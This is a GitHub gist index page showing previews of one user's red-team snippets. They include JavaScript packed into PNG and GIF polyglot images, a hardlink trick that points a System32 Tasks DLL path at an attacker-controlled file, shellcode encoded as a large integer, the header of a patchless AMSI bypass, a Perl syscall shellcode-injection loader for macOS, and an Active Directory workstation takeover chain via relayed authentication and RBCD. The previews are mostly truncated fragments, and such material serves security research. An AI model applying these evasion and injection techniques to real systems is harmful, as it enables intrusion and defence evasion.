Skip to content

Instantly share code, notes, and snippets.

Avatar

Dwight Hohnstein djhohnstein

View GitHub Profile
@djhohnstein
djhohnstein / FastDoubling.cs
Created Jul 26, 2022 — forked from code-scrap/FastDoubling.cs
FastDoubling - Mod RSA 129
View FastDoubling.cs
using System;
class GFG{
// Function calculate the N-th fibonacci
// number using fast doubling method
static void FastDoubling(BigInteger n, BigInteger []res)
{
BigInteger a, b, c, d;
BigInteger MOD = new BigInteger ("114381625757888867669235779976146612010218296721242362562561842935706935245733897830597123563958705058989075147599290026879543541",10);
@djhohnstein
djhohnstein / pnginator.rb
Created Jul 26, 2022 — forked from code-scrap/pnginator.rb
pnginator: pack Javascript into a self-extracting PNG
View pnginator.rb
#!/usr/bin/env ruby -w
# pnginator.rb: pack a .js file into a PNG image with an HTML payload;
# when saved with an .html extension and opened in a browser, the HTML extracts and executes
# the javascript.
# Usage: ruby pnginator.rb input.js output.png.html
# By Gasman <http://matt.west.co.tt/>
# from an original idea by Daeken: http://daeken.com/superpacking-js-demos
@djhohnstein
djhohnstein / gifjs.asm
Created Jul 26, 2022 — forked from code-scrap/gifjs.asm
A Valid GIF and JS file
View gifjs.asm
; a hand-made GIF containing valid JavaScript code
; abusing header to start a JavaScript comment
; inspired by Saumil Shah's Deadly Pixels presentation
; Ange Albertini, BSD Licence 2013
; yamal gifjs.asm -o img.gif
WIDTH equ 10799 ; equivalent to 2f2a, which is '/*' in ASCII, thus starting an opening comment
@djhohnstein
djhohnstein / Update_Notes.md
Created Jul 26, 2022 — forked from code-scrap/Update_Notes.md
You have found THE coolest gist :) Come to DerbyCon to learn more. Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property
View Update_Notes.md

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

@djhohnstein
djhohnstein / output example.md
Created Jul 26, 2022 — forked from code-scrap/output example.md
Shellcode as Numbers - A different kind of calc
View output example.md
16683189189467061193223884768707748125115707836338683708165636755281807331517563442745553664246724105870945763631169132260927526462734007835204880152893128450692630721572368535326118279180786621255867502609753166175114825563868872386555313011639026159359514256068100949221759953685226158201564474886176814194560402374867089196278252086615234757715302275261377043585010851175293923132633446346692061723922182900523634608569996664845671316859814804344017463762348282301284946271053184374916659024239637068041261659983151054361127497750752691523039603283781627522436175359723245473438312970933225984151370749165828689332628371556231892597912020228904274172
166831891894670611932238847687077481251157078363386837081656367552818073315175634427455536642467241058709457636311691322609275264627340078352048801528931284506926307215723685353261182791807866212558675026097531661751148255638688723865553130116390261593595142560681009492217599536852261582015644748861768141945604023748670891962782520866152347577153022752613770435850
@djhohnstein
djhohnstein / patchless_amsi.h
Created Apr 18, 2022 — forked from CCob/patchless_amsi.h
In-Process Patchless AMSI Bypass
View patchless_amsi.h
#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
@djhohnstein
djhohnstein / shellBigInt.cs
Created Feb 8, 2022
Shellcode Stuffed in BigInteger
View shellBigInt.cs
sing System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
@djhohnstein
djhohnstein / sc.js
Created Feb 2, 2022
DynamicWrapperX - Register Code Example
View sc.js
//Example Reference:
// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/
// Test
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools';
// Change that C:\\Tools to a location you specify, or dynamically find current directory.
// ActCTX will search for the DLL in TMP
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';
@djhohnstein
djhohnstein / syscall.pl
Created Oct 27, 2021 — forked from monoxgas/syscall.pl
Perl syscall/sc injection for MacOS
View syscall.pl
use DynaLoader;
use Devel::Peek;
use Fcntl;
use 5.008001; # because 5.6 doesn't have B::PV::object_2svref
use Config;
use B (); # for B::PV
sub mmap {
my ($addr, $size, $protect, $flags) = @_;
syscall(197, $addr, $size, $protect, $flags, -1, 0);
@djhohnstein
djhohnstein / Workstation-Takeover.md
Created Sep 13, 2021 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
View Workstation-Takeover.md

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.